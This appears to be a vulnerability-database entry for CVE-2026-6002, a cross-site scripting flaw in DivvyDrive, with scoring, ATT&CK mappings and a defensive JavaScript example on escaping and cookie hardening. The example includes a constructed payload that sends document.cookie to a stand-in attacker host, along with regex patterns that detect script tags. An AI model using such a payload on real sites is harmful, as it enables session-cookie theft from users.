
CVE-2026-6002

Severity: High
Published: 07 May 2026
Modified: 07 May 2026
CISA KEV: not listed
Patch: affected range ends before 4.8.3.2 (see Vulnerability details)
CVSS v3.1 base score: 8.8 (High), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS score: 0.0033 (24.6th percentile)
Risk Priority: 55 (floored blend, peak EPSS)

Summary

CVE-2026-6002 is a high-severity basic XSS vulnerability (CWE-80, improper neutralization of script-related HTML tags in a web page) in DivvyDrive by DivvyDrive Information Technologies Inc. The page's asset tag "Gov" is inferred from references, not from an NVD CPE. Its CVSS v3.1 base score is 8.8 (High): reachable over the network, low attack complexity, no privileges required, but user interaction is needed (a victim must open a crafted page or link).

Operationally, exploitation aligns with the MITRE ATT&CK technique Drive-by Compromise (T1189). EPSS ranks it at the 24.6th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.


Vulnerability details

Improper neutralization of script-related HTML tags in a web page (basic XSS) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows cross-site scripting (XSS). This issue affects DivvyDrive versions from 4.8.2.9 up to, but not including, 4.8.3.2.

CWE(s)

CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assisted mapping)

T1189 Drive-by Compromise (Initial Access): adversaries may gain access to a system through a user visiting a website over the normal course of browsing.
T1539 Steal Web Session Cookie (Credential Access): an adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

The XSS vulnerability lets an attacker inject script that runs in the browser of any user who views the affected page (drive-by, T1189). Script running in the victim's origin can read and exfiltrate the web session cookie unless that cookie is flagged HttpOnly, which is the T1539 step.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0
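Both techniques above rest on the same defect the vulnerability description names: untrusted text reaching an HTML page without neutralization. The following is an added example, not DivvyDrive's code and not from this page; the file-listing markup, the cookie name DDSESSION and the attacker host are hypothetical. It shows a vulnerable renderer beside its escaped form, a coarse check that a script tag survives in one output and not the other, and the Set-Cookie flags that blunt the T1539 cookie-theft step.

```javascript
// Added example (not DivvyDrive code): how a CWE-80 "basic XSS" bug arises
// when user-controlled text is concatenated into HTML, what the hardened
// version looks like, and why HttpOnly matters for the T1539 mapping.
// File-listing markup, cookie name and attacker host are hypothetical.

// Escaping for text placed inside an HTML element body: the five characters
// that can change HTML structure become entities.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// VULNERABLE: the display name comes straight from the uploader and is
// spliced into markup. A name like <script>...</script> becomes live script
// in every browser that renders the listing (drive-by, T1189).
function renderFileRowVulnerable(displayName) {
  return `<tr><td class="name">${displayName}</td></tr>`;
}

// HARDENED: the same row with the untrusted value escaped for element context.
function renderFileRowSafe(displayName) {
  return `<tr><td class="name">${escapeHtml(displayName)}</td></tr>`;
}

// Coarse check used only to show the difference: does the output still carry
// a raw <script> tag, or an inline on*= handler inside a tag? A real scanner
// would parse the HTML; these regexes are for the example.
function containsActiveContent(html) {
  return /<\s*script\b/i.test(html) || /<[^>]*\son\w+\s*=/i.test(html);
}

// Session cookie hygiene relevant to T1539: script that does run (because of
// a bug like this one) cannot read a cookie flagged HttpOnly, Secure keeps it
// off cleartext, and SameSite limits cross-site use. Adds any missing flag to
// a Set-Cookie value and leaves an already-hardened value unchanged.
function hardenSetCookie(setCookieValue) {
  const parts = setCookieValue.split(";").map((p) => p.trim()).filter(Boolean);
  const have = new Set(parts.slice(1).map((p) => p.split("=")[0].toLowerCase()));
  if (!have.has("httponly")) parts.push("HttpOnly");
  if (!have.has("secure")) parts.push("Secure");
  if (!have.has("samesite")) parts.push("SameSite=Lax");
  return parts.join("; ");
}

// Constructed payload of the kind this CWE describes: a script tag that ships
// document.cookie to a third party (hypothetical host).
const CONSTRUCTED_PAYLOAD =
  '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>';

// Runs the payload through both renderers and hardens a sample cookie header.
function demo() {
  return {
    vulnerable: containsActiveContent(renderFileRowVulnerable(CONSTRUCTED_PAYLOAD)),
    hardened: containsActiveContent(renderFileRowSafe(CONSTRUCTED_PAYLOAD)),
    cookie: hardenSetCookie("DDSESSION=abc123; Path=/"),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The escaping here is correct only for text inside an element body; a value placed into an attribute, a URL, or a script block needs the encoder for that context, which is why template engines that escape by context are preferable to hand-rolled concatenation.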

CVEs Like This One

CVE-2024-39363 (shared CWE-80)
CVE-2024-46910 (shared CWE-80)
CVE-2025-14835 (shared CWE-80)
CVE-2025-22501 (shared CWE-80)
CVE-2024-13497 (shared CWE-80)
CVE-2025-24680 (shared CWE-80)
CVE-2026-33080 (shared CWE-80)
CVE-2025-53835 (shared CWE-80)
CVE-2026-32891 (shared CWE-80)
CVE-2024-56199 (shared CWE-80)

Affected Assets

DivvyDrive (DivvyDrive Information Technologies Inc.), versions from 4.8.2.9 before 4.8.3.2, per the vulnerability description.
Sector tag "Gov" is inferred from references and description; NVD did not file a CPE for this CVE.

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.
